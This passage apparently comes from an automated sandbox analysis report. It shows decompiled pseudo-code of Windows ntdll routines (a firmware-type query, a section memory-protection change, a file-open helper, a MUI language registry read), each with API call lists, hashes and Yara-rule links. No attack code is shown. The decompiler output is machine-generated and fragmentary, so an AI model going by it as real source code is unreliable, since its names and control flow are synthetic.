						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E6B2553CA(0);
						return E6B22D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					memcpy(_t108, _t101, _t115);
					 *((short*)( *(_t118 - 0x80) + _t115)) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E6B1F3690(1, _t117, 0x6b1b1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *(_t118 - 0x70) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E6B21AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), 8,  *(_t118 - 0x70));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *(_t118 - 0x70));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E6B21AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E6B25500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t101 >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E6B219860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}























                                                                                                                            0x6b2551be
                                                                                                                            0x6b2551c3
                                                                                                                            0x6b2551c8
                                                                                                                            0x6b2551cd
                                                                                                                            0x6b2551d0
                                                                                                                            0x6b2551d3
                                                                                                                            0x6b2551d8
                                                                                                                            0x6b2551db
                                                                                                                            0x6b2551de
                                                                                                                            0x6b2551e0
                                                                                                                            0x6b2551e3
                                                                                                                            0x6b2551e6
                                                                                                                            0x6b2551e8
                                                                                                                            0x6b255342
                                                                                                                            0x6b255351
                                                                                                                            0x6b255356
                                                                                                                            0x6b25535a
                                                                                                                            0x6b255360
                                                                                                                            0x6b255363
                                                                                                                            0x6b255366
                                                                                                                            0x6b255369
                                                                                                                            0x6b255369
                                                                                                                            0x6b25536b
                                                                                                                            0x6b25536b
                                                                                                                            0x6b255370
                                                                                                                            0x6b2553a3
                                                                                                                            0x6b2553a4
                                                                                                                            0x6b2553a6
                                                                                                                            0x6b2553ab
                                                                                                                            0x6b2553ab
                                                                                                                            0x6b2553ae
                                                                                                                            0x6b2553ae
                                                                                                                            0x6b2553b5
                                                                                                                            0x6b2553bf
                                                                                                                            0x6b2553bf
                                                                                                                            0x6b255375
                                                                                                                            0x6b255396
                                                                                                                            0x6b2553a0
                                                                                                                            0x6b2553a0
                                                                                                                            0x00000000
                                                                                                                            0x6b255396
                                                                                                                            0x6b255377
                                                                                                                            0x6b255379
                                                                                                                            0x6b25537f
                                                                                                                            0x6b25538c
                                                                                                                            0x6b255390
                                                                                                                            0x00000000
                                                                                                                            0x6b255390
                                                                                                                            0x6b2551ee
                                                                                                                            0x6b2551f1
                                                                                                                            0x6b255301
                                                                                                                            0x6b255310
                                                                                                                            0x6b255315
                                                                                                                            0x6b255318
                                                                                                                            0x6b25531b
                                                                                                                            0x6b255320
                                                                                                                            0x6b25532e
                                                                                                                            0x6b255331
                                                                                                                            0x00000000
                                                                                                                            0x6b255331
                                                                                                                            0x6b255328
                                                                                                                            0x6b255329
                                                                                                                            0x00000000
                                                                                                                            0x6b255329
                                                                                                                            0x6b2551fa
                                                                                                                            0x6b255235
                                                                                                                            0x6b255236
                                                                                                                            0x6b255239
                                                                                                                            0x6b25523f
                                                                                                                            0x6b255240
                                                                                                                            0x6b255241
                                                                                                                            0x6b255242
                                                                                                                            0x6b255246
                                                                                                                            0x6b255247
                                                                                                                            0x6b25524e
                                                                                                                            0x6b255251
                                                                                                                            0x6b255267
                                                                                                                            0x6b255269
                                                                                                                            0x6b25526e
                                                                                                                            0x6b25527d
                                                                                                                            0x6b25527e
                                                                                                                            0x6b255281
                                                                                                                            0x6b255282
                                                                                                                            0x6b255287
                                                                                                                            0x6b255288
                                                                                                                            0x6b25528a
                                                                                                                            0x6b25528f
                                                                                                                            0x6b255294
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b25529a
                                                                                                                            0x6b25529c
                                                                                                                            0x6b25529e
                                                                                                                            0x6b25529e
                                                                                                                            0x6b2552a4
                                                                                                                            0x6b2552b0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2552ba
                                                                                                                            0x6b2552bc
                                                                                                                            0x6b2552bc
                                                                                                                            0x6b2552d4
                                                                                                                            0x6b2552d9
                                                                                                                            0x6b2552dc
                                                                                                                            0x6b2552e1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2552e7
                                                                                                                            0x6b2552f4
                                                                                                                            0x00000000
                                                                                                                            0x6b2552f4
                                                                                                                            0x6b255270
                                                                                                                            0x00000000
                                                                                                                            0x6b255270
                                                                                                                            0x6b2551fc
                                                                                                                            0x6b2551fd
                                                                                                                            0x6b255202
                                                                                                                            0x6b255203
                                                                                                                            0x6b255205
                                                                                                                            0x6b25520a
                                                                                                                            0x6b25520f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b25521b
                                                                                                                            0x6b255226
                                                                                                                            0x6b25522b
                                                                                                                            0x6b25521d
                                                                                                                            0x6b25521d
                                                                                                                            0x6b255222
                                                                                                                            0x6b255222
                                                                                                                            0x6b25522d
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • ZwQuerySystemInformation.1105(0000005A,?,00000020,00000000,6B2B05F0,00000080,6B245CA1,?,?,00000000,0000000E,00000000), ref: 6B255205
                                                                                                                              • Part of subcall function 6B219860: LdrInitializeThunk.NTDLL(6B2615BB,00000073,?,00000008,00000000,?,00000568), ref: 6B21986A
                                                                                                                            • ZwQuerySystemInformationEx.1105(0000006B,?,00000004,00000000,00000000,?,6B2B05F0,00000080,6B245CA1,?,?,00000000,0000000E,00000000), ref: 6B255249
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,?,0000006B,?,00000004,00000000,00000000,?,6B2B05F0,00000080,6B245CA1,?,?,00000000,0000000E), ref: 6B255262
                                                                                                                            • ZwQuerySystemInformationEx.1105(0000006B,?,00000004,00000000,?,?,?,0000006B,?,00000004,00000000,00000000,?,6B2B05F0,00000080,6B245CA1), ref: 6B25528A
                                                                                                                            • RtlFindCharInUnicodeString.1105(00000001,?,6B1B1810,?,6B2B05F0,00000080,6B245CA1,?,?,00000000,0000000E,00000000), ref: 6B255310
                                                                                                                            • RtlEnterCriticalSection.1105(?,6B2B05F0,00000080,6B245CA1,?,?,00000000,0000000E,00000000), ref: 6B255351
                                                                                                                            • memcpy.1105(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?,6B2B05F0,00000080), ref: 6B25537F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: InformationQuerySystem$AllocateCharCriticalEnterFindHeapInitializeSectionStringThunkUnicodememcpy
                                                                                                                            • String ID: Legacy$UEFI
                                                                                                                            • API String ID: 3324348579-634100481
                                                                                                                            • Opcode ID: 015f5d654c0eb8a3092a745bec2ea5940058b19f8352083129b4022d04babc24
                                                                                                                            • Instruction ID: 3af0e3ae7b57efd16bec722b6af6b6b6671b400bcabc8446a43d893ea866a3f5
                                                                                                                            • Opcode Fuzzy Hash: 015f5d654c0eb8a3092a745bec2ea5940058b19f8352083129b4022d04babc24
                                                                                                                            • Instruction Fuzzy Hash: 1D516C7295460DAFDB14CFA8C880BADB7F8BF48704F10406DE659EB291D774D951CB11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B253C93, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 141nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 89%
                                                                                                                            			E6B253C93(intOrPtr __ecx, wchar_t* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				wchar_t* _v32;
				intOrPtr _v36;
				short _v38;
				void* _v40;
				void* _v48;
				void* _v56;
				void* __ebp;
				wchar_t* _t40;
				long _t43;
				long _t67;
				signed int _t72;
				intOrPtr _t75;
				signed short _t76;
				short _t78;
				intOrPtr _t79;
				void* _t80;
				signed short* _t81;
				intOrPtr _t84;
				void* _t85;
				void* _t89;

				_v12 = _v12 & 0x00000000;
				_t81 = __edx;
				_t79 = __ecx;
				_v24 = __ecx;
				_t40 = wcschr(__edx, 0x3d);
				if(_t40 == 0) {
					L25:
					__eflags = 0;
					return 0;
				}
				 *_t40 = 0;
				_t72 =  *_t81 & 0x0000ffff;
				_t87 = _t72 - 0x53;
				if(_t72 != 0x53) {
					__eflags = _t72 - 0x4f;
					if(_t72 != 0x4f) {
						goto L25;
					}
					_t43 = wcstoul( &(_t40[0]),  &_v32, 0x10);
					_t85 = _t85 + 0xc;
					_v12 = _t43;
					__eflags = _t43;
					if(__eflags == 0) {
						goto L25;
					}
					_t67 = 1;
					L6:
					_t80 = E6B253E74(_t79, _t87);
					if(_t80 == 0) {
						goto L25;
					}
					_t75 = 0;
					_t84 = ( *(_t80 + 0x14) & 0x0000ffff) + 0x18 + _t80;
					_t89 = 0 -  *(_t80 + 6);
					while(1) {
						_v8 = _t75;
						if(_t89 >= 0) {
							break;
						}
						_t78 = 8;
						if( *((intOrPtr*)(_t84 + 0xc)) == 0 ||  *((intOrPtr*)(_t84 + 8)) == 0) {
							L23:
							_t75 = _t75 + 1;
							_t84 = _t84 + 0x28;
							_t89 = _t75 - ( *(_t80 + 6) & 0x0000ffff);
							continue;
						} else {
							if(_t67 != 0) {
								_t21 = _t75 + 1; // 0x2
								__eflags = _v12 - _t21;
								if(_v12 != _t21) {
									L21:
									__eflags = _t67;
									if(_t67 != 0) {
										goto L23;
									}
									L22:
									RtlFreeUnicodeString( &_v48);
									_t75 = _v8;
									goto L23;
								}
								L19:
								_v16 =  *((intOrPtr*)(_t84 + 8));
								_v20 =  *((intOrPtr*)(_t84 + 0xc)) + _v24;
								_push( &_v28);
								_push(_a4);
								_push( &_v16);
								_push( &_v20);
								_push(0xffffffff);
								E6B219A00();
								_push(_v28);
								_push(_v16);
								_push(_v20);
								E6B265720(0x55, 3, "Set 0x%X protection for %p section for %d bytes, old protection 0x%X\n", _a4);
								_t85 = _t85 + 0x1c;
								__eflags = _t67;
								if(_t67 != 0) {
									break;
								}
								_t75 = _v8;
								goto L21;
							}
							_t76 = 0;
							_v36 = _t84;
							_v38 = _t78;
							_v40 = 0;
							while( *((char*)((_t76 & 0x0000ffff) + _t84)) != 0) {
								_t76 = _t76 + 1;
								_v40 = _t76;
								if(_t76 < _t78) {
									continue;
								}
								break;
							}
							if(RtlAnsiStringToUnicodeString( &_v48,  &_v40, 1) < 0) {
								goto L25;
							}
							if(RtlCompareUnicodeString( &_v56,  &_v48, 1) == 0) {
								goto L19;
							}
							goto L22;
						}
					}
					return 1;
				}
				RtlInitUnicodeString( &_v56,  &(_t40[0]));
				_t67 = 0;
				goto L6;
			}





























                                                                                                                            0x6b253c9b
                                                                                                                            0x6b253ca2
                                                                                                                            0x6b253ca4
                                                                                                                            0x6b253ca9
                                                                                                                            0x6b253cac
                                                                                                                            0x6b253cb5
                                                                                                                            0x6b253e08
                                                                                                                            0x6b253e08
                                                                                                                            0x00000000
                                                                                                                            0x6b253e08
                                                                                                                            0x6b253cbd
                                                                                                                            0x6b253cc0
                                                                                                                            0x6b253cc3
                                                                                                                            0x6b253cc6
                                                                                                                            0x6b253cd9
                                                                                                                            0x6b253cdc
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b253cec
                                                                                                                            0x6b253cf1
                                                                                                                            0x6b253cf4
                                                                                                                            0x6b253cf7
                                                                                                                            0x6b253cf9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b253cff
                                                                                                                            0x6b253d01
                                                                                                                            0x6b253d08
                                                                                                                            0x6b253d0c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b253d1b
                                                                                                                            0x6b253d1d
                                                                                                                            0x6b253d1f
                                                                                                                            0x6b253d23
                                                                                                                            0x6b253d23
                                                                                                                            0x6b253d26
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b253d32
                                                                                                                            0x6b253d33
                                                                                                                            0x6b253df5
                                                                                                                            0x6b253df9
                                                                                                                            0x6b253dfa
                                                                                                                            0x6b253dfd
                                                                                                                            0x00000000
                                                                                                                            0x6b253d43
                                                                                                                            0x6b253d45
                                                                                                                            0x6b253d94
                                                                                                                            0x6b253d97
                                                                                                                            0x6b253d9a
                                                                                                                            0x6b253de5
                                                                                                                            0x6b253de5
                                                                                                                            0x6b253de7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b253de9
                                                                                                                            0x6b253ded
                                                                                                                            0x6b253df2
                                                                                                                            0x00000000
                                                                                                                            0x6b253df2
                                                                                                                            0x6b253d9c
                                                                                                                            0x6b253d9f
                                                                                                                            0x6b253da8
                                                                                                                            0x6b253dae
                                                                                                                            0x6b253daf
                                                                                                                            0x6b253db5
                                                                                                                            0x6b253db9
                                                                                                                            0x6b253dba
                                                                                                                            0x6b253dbc
                                                                                                                            0x6b253dc1
                                                                                                                            0x6b253dc4
                                                                                                                            0x6b253dc7
                                                                                                                            0x6b253dd6
                                                                                                                            0x6b253ddb
                                                                                                                            0x6b253dde
                                                                                                                            0x6b253de0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b253de2
                                                                                                                            0x00000000
                                                                                                                            0x6b253de2
                                                                                                                            0x6b253d47
                                                                                                                            0x6b253d49
                                                                                                                            0x6b253d4c
                                                                                                                            0x6b253d50
                                                                                                                            0x6b253d54
                                                                                                                            0x6b253d5d
                                                                                                                            0x6b253d5f
                                                                                                                            0x6b253d66
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b253d66
                                                                                                                            0x6b253d79
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b253d90
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b253d92
                                                                                                                            0x6b253d33
                                                                                                                            0x00000000
                                                                                                                            0x6b253e04
                                                                                                                            0x6b253cd0
                                                                                                                            0x6b253cd5
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • wcschr.1105(?,0000003D,00000000,?), ref: 6B253CAC
                                                                                                                            • RtlInitUnicodeString.1105(?,-00000002,00000000,?), ref: 6B253CD0
                                                                                                                            • wcstoul.1105(-00000002,?,00000010,00000000,?), ref: 6B253CEC
                                                                                                                            • RtlAnsiStringToUnicodeString.1105(?,?,00000001,00000000,?), ref: 6B253D72
                                                                                                                            • RtlCompareUnicodeString.1105(?,?,00000001,?,?,00000001,00000000,?), ref: 6B253D89
                                                                                                                            • ZwProtectVirtualMemory.1105(000000FF,?,?,00000000,?,00000000,?), ref: 6B253DBC
                                                                                                                            • DbgPrintEx.1105(00000055,00000003,Set 0x%X protection for %p section for %d bytes, old protection 0x%X,00000000,?,?,?,000000FF,?,?,00000000,?,00000000,?), ref: 6B253DD6
                                                                                                                            • RtlFreeUnicodeString.1105(?,00000000,?), ref: 6B253DED
                                                                                                                            Strings
                                                                                                                            • Set 0x%X protection for %p section for %d bytes, old protection 0x%X, xrefs: 6B253DCD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Unicode$AnsiCompareFreeInitMemoryPrintProtectVirtualwcschrwcstoul
                                                                                                                            • String ID: Set 0x%X protection for %p section for %d bytes, old protection 0x%X
                                                                                                                            • API String ID: 1186784509-1979073566
                                                                                                                            • Opcode ID: 19098b08559af036a2c41244707cb5d49847aeff3a94d1c54c528ee6a7860d3b
                                                                                                                            • Instruction ID: 9851de7d55b4ad9ffc7027169535484c3f43f1caca872111b623f6a94b6e470d
                                                                                                                            • Opcode Fuzzy Hash: 19098b08559af036a2c41244707cb5d49847aeff3a94d1c54c528ee6a7860d3b
                                                                                                                            • Instruction Fuzzy Hash: 4C41B573D4011EBADB21CBA4C881BEEB7F8BF08351F10506AE956E3180E739DA95C760
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20F0BF, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 137memorynativefileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 75%
                                                                                                                            			E6B20F0BF(signed short* __ecx, signed short __edx, void* __eflags, void** _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				char _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v68;
				void* _v72;
				intOrPtr _v76;
				void* _t51;
				signed short _t82;
				short _t84;
				signed int _t91;
				void* _t97;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				void* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E6B1F4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t108 = E6B219830();
					RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v44);
						_push( &_v52);
						_push(_v68);
						_t108 = E6B219990();
						if(_t108 < 0) {
							L10:
							_push(_v68);
							E6B2195D0();
							goto L11;
						} else {
							_t109 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								_t97 = _t21;
								 *((intOrPtr*)(_t109 + 4)) = _v76;
								 *_t109 = 1;
								 *(_t109 + 0x10) = _t97;
								 *(_t109 + 0xe) = _t82;
								 *(_t109 + 8) = _v72;
								 *((intOrPtr*)(_t109 + 0x14)) = _v48;
								memcpy(_t97, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *(_t109 + 0x10) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v76);
										E6B2195D0();
										RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)( *(_t109 + 0x10) + _t100)) = _t84;
										 *((short*)( *(_t109 + 0x10) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}


























                                                                                                                            0x6b20f0d3
                                                                                                                            0x6b20f0d9
                                                                                                                            0x6b20f0e0
                                                                                                                            0x6b20f0e7
                                                                                                                            0x6b20f0f2
                                                                                                                            0x6b20f0f4
                                                                                                                            0x6b20f0f8
                                                                                                                            0x6b20f100
                                                                                                                            0x6b20f108
                                                                                                                            0x6b20f10d
                                                                                                                            0x6b20f115
                                                                                                                            0x6b20f116
                                                                                                                            0x6b20f11f
                                                                                                                            0x6b20f123
                                                                                                                            0x6b20f124
                                                                                                                            0x6b20f12c
                                                                                                                            0x6b20f130
                                                                                                                            0x6b20f144
                                                                                                                            0x6b20f14b
                                                                                                                            0x6b20f152
                                                                                                                            0x6b24bab0
                                                                                                                            0x6b24bab0
                                                                                                                            0x6b20f158
                                                                                                                            0x6b20f158
                                                                                                                            0x6b20f15a
                                                                                                                            0x6b20f160
                                                                                                                            0x6b20f165
                                                                                                                            0x6b20f166
                                                                                                                            0x6b20f16f
                                                                                                                            0x6b20f173
                                                                                                                            0x6b24baa7
                                                                                                                            0x6b24baa7
                                                                                                                            0x6b24baab
                                                                                                                            0x00000000
                                                                                                                            0x6b20f179
                                                                                                                            0x6b20f18d
                                                                                                                            0x6b20f191
                                                                                                                            0x6b24baa2
                                                                                                                            0x00000000
                                                                                                                            0x6b20f197
                                                                                                                            0x6b20f19b
                                                                                                                            0x6b20f19b
                                                                                                                            0x6b20f1a2
                                                                                                                            0x6b20f1a9
                                                                                                                            0x6b20f1af
                                                                                                                            0x6b20f1b2
                                                                                                                            0x6b20f1b6
                                                                                                                            0x6b20f1b9
                                                                                                                            0x6b20f1c4
                                                                                                                            0x6b20f1d8
                                                                                                                            0x6b20f1df
                                                                                                                            0x6b20f1e3
                                                                                                                            0x6b20f1eb
                                                                                                                            0x6b20f1ee
                                                                                                                            0x6b20f1f4
                                                                                                                            0x6b20f20f
                                                                                                                            0x6b24bab7
                                                                                                                            0x6b24babb
                                                                                                                            0x6b24bacc
                                                                                                                            0x6b24bad1
                                                                                                                            0x6b20f215
                                                                                                                            0x6b20f218
                                                                                                                            0x6b20f226
                                                                                                                            0x6b20f22b
                                                                                                                            0x00000000
                                                                                                                            0x6b20f22b
                                                                                                                            0x6b20f1f6
                                                                                                                            0x6b20f1f6
                                                                                                                            0x6b20f1f9
                                                                                                                            0x6b20f1fb
                                                                                                                            0x6b20f1fb
                                                                                                                            0x6b20f1f4
                                                                                                                            0x6b20f191
                                                                                                                            0x6b20f173
                                                                                                                            0x6b20f152
                                                                                                                            0x6b20f203

                                                                                                                            APIs
                                                                                                                            • ZwOpenFile.1105(?,?,?,00000021,00100020,?), ref: 6B20F134
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,?,?,?,00000021,00100020,?), ref: 6B20F14B
                                                                                                                            • ZwQueryVolumeInformationFile.1105(00000000,00000003,?,00000008,00000004,00000000,?,?,?,?,00000021,00100020,?), ref: 6B20F16A
                                                                                                                            • RtlAllocateHeap.1105(?,00000000,?,00000000,00000003,?,00000008,00000004,00000000,?,?,?,?,00000021,00100020,?), ref: 6B20F188
                                                                                                                            • memcpy.1105(00000018,?,00000000,00000000,?,00000000,00000003,?,00000008,00000004,00000000,?,?,?,?,00000021), ref: 6B20F1C4
                                                                                                                            • ZwClose.1105(00000000,00000000,00000003,?,00000008,00000004,00000000,?,?,?,?,00000021,00100020,?), ref: 6B24BAAB
                                                                                                                            • ZwClose.1105(?,?,?,?,?,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000,00000000,6B2C79A0,6B2C79A0), ref: 6B24BABB
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000), ref: 6B24BACC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$CloseFileFree$AllocateInformationOpenQueryVolumememcpy
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 3376599671-2766056989
                                                                                                                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                            • Instruction ID: 41d998cc0469023cbecde7ea0e704f9144ee8da9cdea3a2ced34837dd446f9dd
                                                                                                                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                            • Instruction Fuzzy Hash: DC517D71504715AFC320CF29C881A6BB7F8FF48714F00892EFA9597690EBB8E915CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B28E0E9, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 125memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 85%
                                                                                                                            			E6B28E0E9(intOrPtr __ecx, char* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				char _v52;
				signed int _t53;
				void* _t63;
				void* _t67;
				char* _t73;

				_v8 = _v8 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_t63 = 0;
				_v20 = __ecx;
				_v12 = 7;
				if(__ecx == 0) {
					L14:
					_t74 = 0xc000000d;
				} else {
					_t73 = _a4;
					if(_t73 == 0 || _a8 == 0) {
						goto L14;
					} else {
						RtlInitUnicodeString( &_v28, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\MUI\\Settings");
						_v52 = 0x18;
						_v44 =  &_v28;
						_v8 = 0;
						_push( &_v52);
						_push(0x20019);
						_v48 = 0;
						_push( &_v8);
						_v40 = 0x40;
						_v36 = 0;
						_v32 = 0;
						if(E6B219600() >= 0) {
							RtlInitUnicodeString( &_v28, L"PreferredUILanguages");
							_push(0);
							_t67 = E6B1DF018(_v8,  &_v28,  &_v12, 0,  &_v16);
							_t74 = 0xc0000034;
							if(_t67 == 0xc0000034) {
								goto L4;
							} else {
								_t53 = _v16;
								if(_t53 == 0) {
									goto L4;
								} else {
									if(_t67 == 0x80000005) {
										_t63 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), 8, _t53 + 2);
										if(_t63 != 0) {
											_push(_t67);
											_t74 = E6B1DF018(_v8,  &_v28,  &_v12, _t63,  &_v16);
											if(_t74 >= 0) {
												if(_v12 == 7 || _v12 == 1) {
													 *_t73 = 0;
													_t74 = E6B1E38A4(_v20, _t63, _v16 >> 1, 8, 3, 1, _a8);
												} else {
													goto L4;
												}
											}
										} else {
